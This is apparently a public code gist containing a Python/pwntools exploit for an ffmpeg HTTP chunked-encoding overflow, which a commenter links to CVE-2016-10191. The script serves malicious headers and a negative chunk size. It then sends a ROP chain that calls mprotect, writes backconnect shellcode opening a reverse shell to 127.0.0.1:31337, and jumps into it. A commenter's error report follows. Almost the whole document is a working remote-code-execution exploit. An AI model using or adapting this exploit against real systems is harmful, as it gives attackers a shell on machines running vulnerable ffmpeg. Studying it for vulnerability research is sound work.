@PaulCher
Last active May 4, 2023 18:46
#!/usr/bin/python
import re
import os
import sys
import socket
import threading
from time import sleep
from pwn import *
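# Listener for the malicious "HTTP server". NOTE: 0.0.0.0 binds every interface,
# so any ffmpeg client that can reach this port is served the exploit payload.
bind_ip = '0.0.0.0'
bind_port = 12345

# Fake HTTP response the vulnerable ffmpeg client will parse. Chunked transfer
# encoding is what allows the malformed chunk size sent later in
# handle_request. Header lines are LF- rather than CRLF-terminated; that is
# what the author tested against, so presumably ffmpeg tolerates it -- verify
# before porting to another client.
headers = """HTTP/1.1 200 OK
Server: HTTPd/0.9
Date: Sun, 10 Apr 2005 20:26:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
"""

# Target binary. Every address in this script -- the gadgets searched for below
# AND the hard-coded ones inside handle_request -- belongs to the author's
# particular (non-PIE, 0x400000-based) ffmpeg build. A different build changes
# all of them, and the searches below then fail.
elf = ELF('ffmpeg/ffmpeg')

shellcode_location = 0x00400000  # first page of the non-PIE image: made RWX, then overwritten with shellcode
page_size = 0x1000
rwx_mode = 7                     # PROT_READ | PROT_WRITE | PROT_EXEC for mprotect(2)


def gadget(insns):
    """Return the address of the first occurrence of `insns` in the target binary.

    `insns` is assembled for linux/amd64 and the resulting byte string is
    searched for in the loaded ELF.

    Raises:
        ValueError naming the missing gadget when the byte sequence is not
        present, instead of letting next() leak a bare StopIteration -- which
        is exactly what happens when this script is pointed at a different
        ffmpeg build.
    """
    code = asm(insns, os='linux', arch='amd64')
    for address in elf.search(code):
        return address
    raise ValueError(
        'gadget %r (bytes %r) not found in %s: this exploit is tied to one specific ffmpeg build'
        % (insns, code, elf.path))


pop_rdi = gadget('pop rdi; ret')
pop_rsi = gadget('pop rsi; ret')
pop_rax = gadget('pop rax; ret')
pop_rcx = gadget('pop rcx; ret')
pop_rdx = gadget('pop rdx; ret')
pop_rbp = gadget('pop rbp; ret')
# The next three are looked up but never used by handle_request, which
# hard-codes the corresponding addresses instead.
push_rbx = gadget('push rbx; jmp rdi')
pop_rsp = gadget('pop rsp; ret')
add_rsp = gadget('add rsp, 0x58')  # searched WITHOUT a trailing ret, unlike the author's listing
mov_gadget = gadget('mov qword [rcx], rax ; ret')
mprotect_func = elf.plt['mprotect']
read_func = elf.plt['read']  # resolved but unused in this script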
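def handle_request(client_socket):
    """Serve one connection from the vulnerable ffmpeg client.

    Sends the fake HTTP response, a negative chunk size, and then the
    overflow payload (stack pivot -> mprotect -> shellcode).

    Args:
        client_socket: the accepted TCP socket. It is always closed before
            returning, even if a send fails part-way through.
    """
    try:
        # Drain whatever the client sent; the request itself is never inspected.
        client_socket.recv(2048)

        payload = ''
        payload += 'C' * (0x8040)
        payload += 'CCCCCCCC' * 4
        # The hard-coded addresses below are for the author's ffmpeg build (see
        # the gadget listing at the end of this function). The module-level
        # add_rsp / pop_rsp / push_rbx lookups are NOT used here, so these do
        # not follow the binary if it is rebuilt.
        payload += p64(0x0058dc48) # add rsp, 0x58 ; ret -- rop starts here
        payload += 'CCCCCCCC' * 4
        payload += p64(0x00d89257) # pop rsp ; ret -- the value that ends up in rdi (author's note)
        payload += p64(0x010ccd95) # push rbx ; jmp rdi -- reached via a `call *%rax` (author's note)
        payload += 'BBBBBBBB' * 3
        payload += 'AAAA'
        payload += p32(0)
        payload += 'AAAAAAAA'
        payload += p64(0x0058dc48) # second add rsp, 0x58 to jump into the uncorrupted chunk
        payload += 'XXXXXXXX' * 11
        # real rop payload starts here
        #
        # mprotect(shellcode_location, page_size, rwx_mode): make the page at
        # 0x400000 writable and executable so the shellcode can be stored there.
        payload += p64(pop_rdi)
        payload += p64(shellcode_location)
        payload += p64(pop_rsi)
        payload += p64(page_size)
        payload += p64(pop_rdx)
        payload += p64(rwx_mode)
        payload += p64(mprotect_func)
        # backconnect shellcode x86_64: 127.0.0.1:31337
        # (7f 00 00 01 and 7a 69 in the bytes) -- a listener must already be
        # waiting on that port on the target host.
        shellcode = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\xc7\x44\x24\x04\x7f\x00\x00\x01\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"
        # Front-pad with 1..8 NOPs so the shellcode splits into whole qwords.
        shellcode = '\x90' * (8 - (len(shellcode) % 8)) + shellcode
        shellslices = [shellcode[i:i + 8] for i in range(0, len(shellcode), 8)]
        # Store each qword with: pop rax <slice>; pop rcx <addr>; mov [rcx], rax.
        # NOTE(review): the first write lands at shellcode_location - 8
        # (0x3ffff8), which is just below the page that was mprotect'd; on a
        # standard non-PIE layout nothing is mapped there. Kept as the author
        # had it -- confirm against the target's memory map before relying on it.
        write_location = shellcode_location - 8
        for shellslice in shellslices:
            payload += p64(pop_rax)
            payload += shellslice
            payload += p64(pop_rcx)
            payload += p64(write_location)
            payload += p64(mov_gadget)
            write_location += 8
        # Finally return into the freshly written shellcode. Why rbp is set to 4
        # first is not explained by the author.
        payload += p64(pop_rbp)
        payload += p64(4)
        payload += p64(shellcode_location)
        # Author's gadget listing for the targeted build:
        # 0x009e5641: mov qword [rcx], rax ; ret ; (1 found)
        # 0x010ccd95: push rbx ; jmp rdi ; (1 found)
        # 0x00d89257: pop rsp ; ret ; (1 found)
        # 0x0058dc48: add rsp, 0x58 ; ret ; (1 found)

        # sendall() rather than send(): the payload is over 32 KiB and a single
        # send() on a blocking socket may transmit only part of it, truncating
        # the ROP chain.
        client_socket.sendall(headers)
        # Negative chunk size: the malformed chunked-encoding input that the
        # client mishandles (presumably in its chunk-size parsing).
        client_socket.sendall('-1\n')
        # Author's timing: let the client consume the headers and chunk size
        # before the overflow data arrives.
        sleep(5)
        client_socket.sendall(payload)
    finally:
        client_socket.close()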
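if __name__ == '__main__':
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((bind_ip, bind_port))
    listener.listen(5)

    # Auto-restart hook: exit (so an outer loop can relaunch) once this script
    # changes on disk. The absolute path is used so the check does not depend on
    # the working directory (basename alone fails when started from elsewhere),
    # and mtime/size are compared instead of the whole stat tuple, which also
    # changes when a mere read updates atime.
    script_path = os.path.abspath(__file__)

    def _script_signature():
        """Return (mtime, size) of this script for change detection."""
        st = os.stat(script_path)
        return (st.st_mtime, st.st_size)

    initial_signature = _script_signature()
    try:
        while True:
            # Connections are served one at a time; handle_request closes the socket.
            client_socket, addr = listener.accept()
            handle_request(client_socket)
            if _script_signature() != initial_signature:
                print('restarted')
                sys.exit(0)
    finally:
        listener.close()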
@VeilBlade

Lately I have been trying to reproduce this bug, but when I run this script I get the output below and cannot find any information about it on the internet. Can anybody help me?

[@inspiron]:[CVE_2016_10191]$ ./exploit_ffmpeg.py
[*] '/media/*/750G-01/downloads/CVE_2016_10191/bin/ffmpeg'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
FORTIFY: Enabled
Traceback (most recent call last):
File "./exploit_ffmpeg.py", line 56, in
mov_gadget = gadget('mov qword [rcx], rax; ret')
File "./exploit_ffmpeg.py", line 44, in
gadget = lambda x: next(elf.search(asm(x, os='linux', arch='amd64')))
StopIteration

my system is:
Linux inspiron 4.10.0-35-generic #39~16.04.1-Ubuntu SMP Wed Sep 13 09:02:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
